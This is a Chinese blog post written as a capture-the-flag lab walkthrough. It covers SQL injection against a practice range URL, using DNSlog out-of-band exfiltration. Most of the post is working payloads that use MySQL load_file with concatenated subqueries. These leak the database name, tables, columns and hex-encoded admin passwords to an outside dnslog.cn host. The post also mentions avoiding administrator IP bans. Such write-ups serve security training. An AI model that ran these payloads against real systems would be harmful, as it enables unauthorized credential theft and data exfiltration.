封神台 dnslog注入_nc0.cdn.zkaq.cn-CSDN博客

本文链接：https://blog.csdn.net/weixin_43836174/article/details/108258489

靶场地址：http://59.63.200.79:8022/cat/?id=1
第一步注入点寻找
   寻找注入点，初步判断id=1处为注入点
   尝试试用 and 1=1 返回成功 1=2 报错
第二步初步测试注入
   找到注入点试用 order by n 查询
![](https://nc0.cdn.zkaq.cn/md/6263/bdf6430495304a773942341564db2105_12336.png)
   发现可以回显的字符是2为使用 union select 1，2 判断回显位为2
![](https://nc0.cdn.zkaq.cn/md/6263/11c278c318828720ffba5f0ce39b6f7c_65185.png)
       注：由于手工注入需要频繁测试，容易导致ip被管理员给ban掉所以使用dnslog注入
第三步 dnslog注入
   打开http://dnslog.cn/ get dns地址确认是否能正常使用（使用ping命令）
   使用load_file（可以读取本地/远程文件）函数进行注入
   payload1（查询数据库名）：id=1 and (select load_file(concat('//',(select database()),'.5djib5.dnslog.cn/1.txt'))) 注：其中5djib5.dnslog.cn为获取的dns地址
![](https://nc0.cdn.zkaq.cn/md/6263/fb9aa972050bba377031445b5e809572_50414.png)
![](https://nc0.cdn.zkaq.cn/md/6263/47f47704f52e191d1255f343a85d4d62_78845.png)
   通过payload1查询出数据库名为mashe
   使用payload2（查询表名）id=1 and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database()limit 0,1),'.5djib5.dnslog.cn/1.txt')))
![](https://nc0.cdn.zkaq.cn/md/6263/040f0eb390f94a582c49216be77c6156_63409.png)
   使用payload3（查询列名）：id=1 and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1/2,1/2),'.rmim3o.dnslog.cn/1.txt'))) 注:1/2 替换查询返回结果不一样
![](https://nc0.cdn.zkaq.cn/md/6263/271e81e63ea4f7c55f3247009fe58cca_76936.png)
   使用payload3（查询字段）id=1 and (select load_file(concat('//',(select hex(password) from admin limit 0,1),'.v1pfwj.dnslog.cn/1.txt')))
![](https://nc0.cdn.zkaq.cn/md/6263/a180e2492aabf9c6c34db1349cbb9235_35523.png)
发现解码出来的password并不是flag 所以继续查询 1，1
   使用payload3（查询字段）id=1 and (select load_file(concat('//',(select hex(password) from admin limit 1,1),'.v1pfwj.dnslog.cn/1.txt')))
![](https://nc0.cdn.zkaq.cn/md/6263/bccdf0893e4e998d59981d2e494f7d6e_86966.png)
![](https://nc0.cdn.zkaq.cn/md/6263/00a3d23b29c1e406aca2ae2bb394550a_42857.png)
提交flag即可